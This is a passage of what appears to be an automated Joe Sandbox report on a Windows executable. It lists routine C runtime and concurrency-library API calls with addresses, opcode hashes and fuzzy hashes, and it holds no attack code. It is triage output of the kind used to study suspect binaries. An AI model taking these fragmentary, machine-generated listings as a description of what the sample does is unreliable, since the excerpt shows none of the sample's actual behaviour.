                                                          • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                        • _free.LIBCMT ref: 0043177A
                                                        • _free.LIBCMT ref: 0043178D
                                                        • _free.LIBCMT ref: 0043179E
                                                        • _free.LIBCMT ref: 004317AF
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        APIs
                                                        • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCEF
                                                        • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD20
                                                        • GetCurrentThread.KERNEL32 ref: 0041CD29
                                                        • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD3C
                                                        • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD45
                                                        Similarity
                                                        • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                        • String ID:
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\VAIIBIHmtT.exe,00000104), ref: 0042F773
                                                        • _free.LIBCMT ref: 0042F83E
                                                        • _free.LIBCMT ref: 0042F848
                                                        Strings
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                        APIs
                                                        • SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID: 11@$f(@
                                                        APIs
                                                        • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F2D
                                                          • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F17
                                                          • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F2C
                                                        • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F60
                                                        • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F8B
                                                        Strings
                                                        Similarity
                                                        • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                        • String ID: 11@
                                                        APIs
                                                        • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
                                                          • Part of subcall function 00410A71: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A84
                                                          • Part of subcall function 00410A71: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A8E
                                                        • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B7B
                                                        • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BC1
                                                        Strings
                                                        Similarity
                                                        • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                        • String ID: 11@
                                                        APIs
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA73
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA81
                                                        Strings
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                        • String ID: 11@$pContext
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                        • ExitThread.KERNEL32 ref: 0042DFFA
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                        • String ID: f(@
                                                        APIs
                                                        • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424319
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042432B
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00424339
                                                        Strings
                                                        Similarity
                                                        • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                        • String ID: pScheduler
                                                        • API String ID: 1381464787-923244539
                                                        • Opcode ID: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                        • Instruction ID: dcb9093c936754fa26cda4c49a5e66a6ec85891f206a073b4e5aa53fece02954
                                                        • Opcode Fuzzy Hash: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                        • Instruction Fuzzy Hash: 23F0A731B0122467C718FB55E842D9E77B99E403087D0816FB802A3182CF7CA949C69D
                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E073
                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E082
                                                        • _free.LIBCMT ref: 0042E089
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CloseFreeHandleLibrary_free
                                                        • String ID: -B
                                                        • API String ID: 621396759-1993606306
                                                        • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                        • Instruction ID: 17050b68875c52b9acd6c54ac6ffc846a702ed9b00f998fe1c0864977ee07d81
                                                        • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                        • Instruction Fuzzy Hash: E9E08632101A34AFD7315F57F808B57BBD4EF15722F54C52AE41911560C7B9AD82CB9C
                                                        APIs
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DDA
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DE8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                        • String ID: pScheduler$version
                                                        • API String ID: 1687795959-3154422776
                                                        • Opcode ID: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                        • Instruction ID: 654ef00f808b34ad7b75b8e59998346ebad61dbc4125ce9a21f33dce7aa536fc
                                                        • Opcode Fuzzy Hash: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                        • Instruction Fuzzy Hash: 5CE04F30900608F6CB14AA55D80ABDD77A45B11749F60C02B7855610D29ABCA6D8CB4A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID:
                                                        • API String ID: 1036877536-0
                                                        • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                        • Instruction ID: f9eb826db87fdf2ea4d980863b0040f81c60248b0af39ab0b887e88b27670142
                                                        • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                        • Instruction Fuzzy Hash: BEA14871A00B869FEB11DE18C8917AEFBE5EF19310F18426FE5859B381C27C9D41C799
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: b9774af663f327122f9d753528d2dba7810faef361dd64adb4083294f63d66f0
                                                        • Instruction ID: 944ec9a8cfd15a85abea22ed7e483bbecdcf94b25d0ac16da2a86ed09b95ce29
                                                        • Opcode Fuzzy Hash: b9774af663f327122f9d753528d2dba7810faef361dd64adb4083294f63d66f0
                                                        • Instruction Fuzzy Hash: E8414771E00210AADB247BBBDC52ABF76A8EF4D334F14127BF418C6291D67C9D49826D
                                                        APIs
                                                        • ShowWindow.USER32(00000005), ref: 00401FCB
                                                        • UpdateWindow.USER32 ref: 00401FD3
                                                        • ShowWindow.USER32(00000000), ref: 00401FE7
                                                        • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040204A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$MoveUpdate
                                                        • String ID:
                                                        • API String ID: 1339878773-0
                                                        • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                        • Instruction ID: 839b3a4605fc6fa716c5a1e9d0f595454ae31d99f498b0463e76923fa4e42aa6
                                                        • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                        • Instruction Fuzzy Hash: 83016531E006109BC7258F19ED48A267BAAFFD5712B14803AF40C972B1D7B1EC42CB9C
                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00429103
                                                          • Part of subcall function 00429050: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042907F
                                                          • Part of subcall function 00429050: ___AdjustPointer.LIBCMT ref: 0042909A
                                                        • _UnwindNestedFrames.LIBCMT ref: 00429118
                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429129
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00429151
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                        • String ID:
                                                        • API String ID: 737400349-0
                                                        • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                        • Instruction ID: c9ce71b37bf0ada561c0f38da96873ff120a9bb937dab02468c91de1f254ac1d
                                                        • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                        • Instruction Fuzzy Hash: F0018032200159BBDF12AE92DC46EEB3B69EF49758F444009FE0856121C33AEC71DBA8
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue), ref: 00434F81
                                                        • GetLastError.KERNEL32(?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FCC), ref: 00434F8D
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F9B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                        • Instruction ID: 0cc1d3989d4ca165353a689bafe11803c7becb77e2de78a39e4b2d1452c45288
                                                        • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                        • Instruction Fuzzy Hash: 2601FC366052226BC7214F69AC449A7B7D8AF8AFA1F251631F905D3240D724ED01CAE8
                                                        APIs
                                                        • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426168
                                                        • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042617C
                                                        • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426194
                                                        • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004261AC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                        • String ID:
                                                        • API String ID: 78362717-0
                                                        • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                        • Instruction ID: b0d532a26f63f6046bced7af3b1e02d5ba17ec3ebf316f442b0a79b2244c41dd
                                                        • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                        • Instruction Fuzzy Hash: 3F01F232700120ABCF16AE569811AFF779AAF90354F41001BFC11A7282CA34FD2192A8
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 0040594B
                                                          • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405996
                                                        • __Getcoll.LIBCPMT ref: 004059A5
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059B5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                        • String ID:
                                                        • API String ID: 1836011271-0
                                                        • Opcode ID: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                        • Instruction ID: 9fd44fd2a3ed9f30d206a08b807669c32d498cc680062da3e3aec36702d876a7
                                                        • Opcode Fuzzy Hash: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                        • Instruction Fuzzy Hash: 710135B1920209DFDB10EFA5C48279DBBB0FF00314F00813EE445AB281DB789984CF99
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 00404E8F
                                                          • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EDA
                                                        • __Getcoll.LIBCPMT ref: 00404EE9
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EF9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                        • String ID:
                                                        • API String ID: 1836011271-0
                                                        • Opcode ID: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                        • Instruction ID: 32d9f0e851cf819fcbf451bbe4f834ae4b9dc531d1d0ebefa622e2c81c742f75
                                                        • Opcode Fuzzy Hash: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                        • Instruction Fuzzy Hash: 9F015771910209DFEB10EFA5C48179DB7B0BF80314F00813EE445AB281DB789984CB99
                                                        APIs
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF49
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF5D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Compare_exchange_acquire_4std::_
                                                        • String ID:
                                                        • API String ID: 3973403980-0
                                                        • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                        • Instruction ID: 72732f5efe9b63b971529a3f0cd962c81f2cd17cb7f3a1b82d9d198b59e5c030
                                                        • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                        • Instruction Fuzzy Hash: FB01F63608414DBBCF129E64DC428EE3B26EB08354B148416FD18C4232C336CAB2AF8E
                                                        APIs
                                                        • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110FB
                                                          • Part of subcall function 0041096D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041098F
                                                          • Part of subcall function 0041096D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109B0
                                                        • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041110E
                                                        • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041111A
                                                        • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411123
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                        • String ID:
                                                        • API String ID: 4284812201-0
                                                        • Opcode ID: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                        • Instruction ID: 32ef31896b2cb6abdcbb34161c10e74fd4bf83775755d0cce9f66a209d269357
                                                        • Opcode Fuzzy Hash: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                        • Instruction Fuzzy Hash: 5EF02470A8020467DF24BBA648525EE72954F84328F14003FB7126B7D2CEBC4DC2929C
                                                        APIs
                                                        • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413545
                                                          • Part of subcall function 004128CF: ___crtGetTimeFormatEx.LIBCMT ref: 004128E5
                                                          • Part of subcall function 004128CF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00412904
                                                        • GetLastError.KERNEL32 ref: 00413561
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413577
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00413585
                                                          • Part of subcall function 004126A5: SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                        • String ID:
                                                        • API String ID: 1674182817-0
                                                        • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                        • Instruction ID: d4d0e34155d1b65ea1fa919a817b0ae51ac78690af07c02d22dcd9fb344bc12c
                                                        • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                        • Instruction Fuzzy Hash: 80F0E2B1A002193AE720BA765D07FFB369C9B00B90F90081BB905E6082EDDCD95042BC
                                                        APIs
                                                        • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00412628
                                                        • GetLastError.KERNEL32(?,?,?,?,004185E9,?,?,?,?,00000000,?,00000000), ref: 00412637
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041264D
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041265B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                        • String ID:
                                                        • API String ID: 3803302727-0
                                                        • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                        • Instruction ID: 0dfe4b91b17fca29e91fbe1ee06f4a4a2df34707d6a261af2a3e5670f24271a8
                                                        • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                        • Instruction Fuzzy Hash: 34F0A07460010EBBCF10EFA5DE45EEF37686B00705F600656B514E20E1DA78DA149768
                                                        APIs
                                                        • ___crtCreateEventExW.LIBCPMT ref: 0041234C
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00410B59), ref: 0041235A
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412370
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041237E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                        • String ID:
                                                        • API String ID: 200240550-0
                                                        • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                        • Instruction ID: f5537a877189a90aa28975f9b1b11099a3717870695f97e2c6136de35ce4b3b1
                                                        • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                        • Instruction Fuzzy Hash: ADE0D871A0021E29E720B7768D07FBF369C6B00B45F54086BBD14E11C3FDACD61041AC
                                                        APIs
                                                          • Part of subcall function 00412712: TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                        • TlsAlloc.KERNEL32(?,00410B59), ref: 0042399F
                                                        • GetLastError.KERNEL32 ref: 004239B1
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239C7
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004239D5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                        • String ID:
                                                        • API String ID: 3735082963-0
                                                        • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                        • Instruction ID: 6dd5cecd5731d0fd3396096e4a73a475127880a88571f9a1564212530dcc10d0
                                                        • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                        • Instruction Fuzzy Hash: C9E02BF45003245EC310BF72AD4A66F3274790170AB600E2BF015D2192EEBCD1844A9C
                                                        APIs
                                                        • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B59,?,?,?,00000000), ref: 00412557
                                                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412566
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041257C
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041258A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                        • String ID:
                                                        • API String ID: 3016159387-0
                                                        • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                        • Instruction ID: 951ac86653187ea2db5183bbef748415e33b6f8be8890effbe132357fd44ea8b
                                                        • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                        • Instruction Fuzzy Hash: 69E04874A0010DABC714EFB5DF49AEF73BC7A00A45FA00466A501E2151EA6CDB04977D
                                                        APIs
                                                        • SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                        • GetLastError.KERNEL32 ref: 004126BD
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126D3
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004126E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                        • String ID:
                                                        • API String ID: 4286982218-0
                                                        • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                        • Instruction ID: d6ad487b4c18070c6cf6a1f44c15ecb3f6d05e9c3d6252d545de6a15e1df0045
                                                        • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                        • Instruction Fuzzy Hash: BBE086746001196BCB24BF61DE06BFF376C7B00745F50082BB515D50A1EF7DD56486AC
                                                        APIs
                                                        • TlsSetValue.KERNEL32(?,00000000,00417991,00000000,?,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412777
                                                        • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412783
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412799
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004127A7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                        • String ID:
                                                        • API String ID: 1964976909-0
                                                        • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                        • Instruction ID: 402fe0f5bbe0f151a29ab6283833ac733f3ad497baf8671b47c41dc8f6c9e06d
                                                        • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                        • Instruction Fuzzy Hash: F7E086746001196BDB20BF65DE09BFF37AC7F00745F50082AB515D50A1EE7DD564869C
                                                        APIs
